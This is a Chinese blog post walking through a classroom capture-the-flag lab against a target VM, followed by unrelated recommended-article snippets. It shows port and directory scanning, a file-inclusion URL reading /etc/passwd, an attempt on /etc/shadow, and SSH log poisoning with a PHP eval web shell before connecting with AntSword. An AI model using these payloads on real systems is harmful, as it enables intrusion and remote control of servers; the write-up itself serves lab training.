9.4课堂靶场练习

最新推荐文章于 2024-09-04 22:05:18 发布
最新推荐文章于 2024-09-04 22:05:18 发布
阅读量216 收藏 2
点赞数 2
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45079558/article/details/141891863
版权

使用御剑扫描同网段ip

发现目标ip

使用nmap -sS 172.16.1.0/24扫描端口

使用目录扫描工具扫描一下80端口

dirb http://172.16.1.113:80

扫描完毕发现有一个/antibot_image路径尝试访问一下看看

发现可以进行目录遍历 接下来我们在目录中寻找有价值信息

发现phpinfo

右键源代码看看

发现include,可以使用文件包含漏洞

因为前面我们看到了这个靶机是linux系统,(Ubuntu的嘛),所以我们可以使用一下linux的特性,去尝试看一下/etc/passwd文件,这个文件是存放linux系统用户的地方(用?image去传递我们想要加的参数).

http://172.16.1.113/antibot_image/antibots/info.php?image=/etc/passwd

发现我们成功的查看到了/etc/passwd文件的内容。

这里我们看到了有一个用户Tomato的uid为1000(我们linux主机创建的第一个用户的uid为1000),且它的shell为/bin/bash(说明可以分配终端),再结合我们前面扫到的2211远程连接端口,说明这个用户是可以被远程连接的,我们知道了用户名,知道了端口号,知道了ip地址,就差密码就可以远程连接这个靶机了,既然前面可以看/etc/passwd,我们也可以看一下/etc/shadow文件,这样密码也知道了

发现看不了这个/etc/shadow文件,这条路断了。

我们直接连不上的话,我们可以尝试一下报错远程连接(原理是我们构造一个报错连接,把一句话木马构造进去,之后我们访问靶机报错日志,如果我们构造的报错连接被日志记录且保存下来了,那么当我们查看这个报错日志的时候,就相当于木马被写入了报错日里,我们就可以用远程连接工具(蚁剑,菜刀,冰蝎等远程工具去连接了。

ssh远程连接的命令格式:       ssh 用户名@主机号 -p 端口号

ssh '<?php @eval($_POST[1]);?>'@172.16.1.113 -p 2211

可以发现我们用一句话木马代替了要连接的用户名,构造了一个错误的连接。

蚁剑连接

亚历山大——纯真丁一郎
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kettle9.4版本 Pentaho Data Integration 9.4 PDI 9.4
10-26
Kettle9.4版本 Pentaho Data Integration 9.4 PDI 9.4 下载地址: https://www.hitachivantara.com/en-us/products/pentaho-platform/data-integration-analytics/pentaho-community-edition.html ...
Memtest86 Pro 9.4
06-27
**Memtest86 Pro 9.4:内存测试的专业选择** Memtest86 Pro 9.4是一款专门针对计算机内存进行深度检测和故障排查的工具。在计算机硬件中,内存扮演着至关重要的角色,它是系统运行速度和稳定性的重要决定因素。然而...
数学分析教程史济怀练习9.4
蜜汁菠萝头
07-26 343
9.4
Python For Everybody 练习题解9.4
JimmyWangJimmy的博客
04-08 565
PForE_9.4.py name = input("Enter file:") if len(name) < 1: name = "mbox-short.txt" handle = open(name) lst = list() d = dict() for line in handle: if line.startswith("From "): wds = line.split() d[wds[1]] = d.get(wds[1], 0) +
练习9.4_就餐人数_Python编程:从入门到实践(第3版)
weixin_56575758的博客
01-02 550
添加一个名为increment_number_served()的方法,用来让就餐人数递增。在为练习9.1编写的程序中,添加一个名为number_served的属性,并将其默认值设置为0。添加一个名为set_number_served()的方法,用来设置就餐人数。根据这个类创建一个名为restaurant的实例。打印有多少人在这家餐馆就餐过,然后修改这。法并向它传递一个这样的值:你认为这家餐馆每天可能接待的就餐人数。传递新的就餐人数,然后再次打印这个值。餐厅接待人数:500。餐厅接待人数:600。
k8s离线安装安装skywalking9.4
流月up的博客
07-04 1273
k8s离线安装安装skywalking9.4
安装Rocky-9.4系统
xzyy1022的博客
05-23 3046
Rocky-9.4的安装
2019_2020学年八年级物理下册9.4大气压强练习含解析新版教科版20200429272
09-08
这篇资料主要围绕初中物理中大气压强的相关知识点展开,涵盖了多个与大气压强相关的实验、现象及应用。以下是这些知识点的详细解释: 1. **大气压强的影响**:在高原地区,由于大气压较低,水的沸点也会降低,因此...
七年级数学上册 9.4 整式练习(无答案) 沪教版五四制 试题.doc
11-05
七年级数学上册 9.4 整式练习(无答案) 沪教版五四制 试题.doc
Pentaho Kettle 9.4
08-21
Pentaho Kettle 9.4
Linux 系统入门:高级系统管理与文本处理
weixin_52392194的博客
09-01 1286
是一个功能强大的文件查找工具,可以根据文件名、类型、大小、修改时间等多种条件来查找文件,并支持对查找到的文件执行进一步操作。命令是一个动态命令行工具,能够显示当前系统中资源占用最高的进程,并允许用户对进程进行交互式管理。通过掌握这些命令,用户可以高效地处理和管理 Linux 系统中的文本和文件数据,大大提升工作效率。通过灵活运用这些命令,用户可以有效管理系统中的进程,确保系统在高效、稳定的状态下运行。这个命令列出所有用户的所有进程,包括进程的详细信息,例如 CPU 和内存的使用情况。
UE5学习笔记19-服务器的更新频率,根骨骼旋转节点
m0_53219246的博客
09-01 315
服务器的更新频率,根骨骼旋转节点,旋转速率
搭建基于Linux的TCP服务器与客户端
m0_63764282的博客
09-01 477
【代码】搭建基于Linux的TCP服务器与客户端。
Linux——用户和权限
c1tenj2的博客
08-31 1138
root用户拥有最大的系统操作权限,而普通用户在许多地方的权限是受限的。使用普通用户在根目录下创建文件夹切换到root用户后,继续尝试普通用户的权限,一般在其HOME目录内是不受限的。一旦出了HOME目录,大多数地方,普通用户仅有只读和执行权限,无修改权限。
imap发送邮件:如何配置IMAP服务器发邮件?
DengHua2203的博客
09-04 309
IMAP发送邮件不仅能够提升您的邮件管理效率,还能让您在多个设备上无缝同步邮件。AokSend:融合API与SMTP,支持IMAP灵活发信,高效邮件服务,助力企业沟通升级,安全无忧!
linux~~目录结构&&远程登录教程(xshell+xftp)
最新发布
binhyun的博客
09-04 643
1.目录结构 2.远程登录xshell 2.1所需工具 2.2了解虚拟机IP 2.3查看是否正常连接 2.4xshell进行连接 3.文件传输xftp7 3.1xftp6安装 3.2相关设置 3.3效果展示 3.4文件之间的传输过程
GPT说【网络协议实践:HTTP】如何从服务器上发送一个pdf文件给客户端。
uncompleted code —— 代码片段
09-01 1122
要在 Flask 中处理客户端请求 PDF 文件并返回该文件,可以使用send_file或函数。假设已经有一个 PDF 文件,并且这个文件位于服务器上 static/pdf 目录中,你可以按照以下步骤来实现。
多进程并发服务器
qy3333的博客
09-04 254
printf("%s:%d发来信息%s\n",inet_ntoa(cln.sin_addr),ntohs(cln.sin_port),buff);printf("%s:%d发来连接请求\n",inet_ntoa(cln.sin_addr),ntohs(cln.sin_port));printf("客户端退出\n");printf("发送成功\n");printf("设置端口快速复用成功\n");
Linux(CentOS)同步服务器时间之~ntpd
IT后浪的博客
09-01 1768
NTP是 Network Time Protocol(网络时间协议)的缩写,它是一种用于在计算机系统之间同步时间的协议。NTP 允许网络中的设备通过与一个或多个时间服务器进行通信,来校正自身的系统时钟,确保所有设备上的时间保持高度一致。
python练习9.4就餐人数
06-27
Python练习9.4可能是指某个编程题目或者项目的一部分,但没有具体的上下文信息,所以我无法直接提供详细的解答。通常,这种练习可能涉及到创建一个程序来模拟就餐人数的变化,比如餐厅管理系统的简单模型。 假设这个练习要求你编写代码来跟踪餐厅在特定时间段内的就餐人数,并可能包括以下几个部分: 1. 创建一个数据结构(如列表、字典或集合)来存储每个小时的就餐人数。 2. 提供函数来添加就餐人数(例如`add_guests(hour, num_guests)`)和查询某个时间点的就餐人数(例如`get_guests_at(hour)`)。 3. 可能还需要考虑就餐完毕后的人数变化(`remove_guests_at(hour)`)。 4. 示例可能涉及到使用循环、条件语句以及可能的时间戳处理。 如果你能提供更多的细节或者练习的具体描述,我可以给出更准确的帮助。以下是相关问题的示例:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值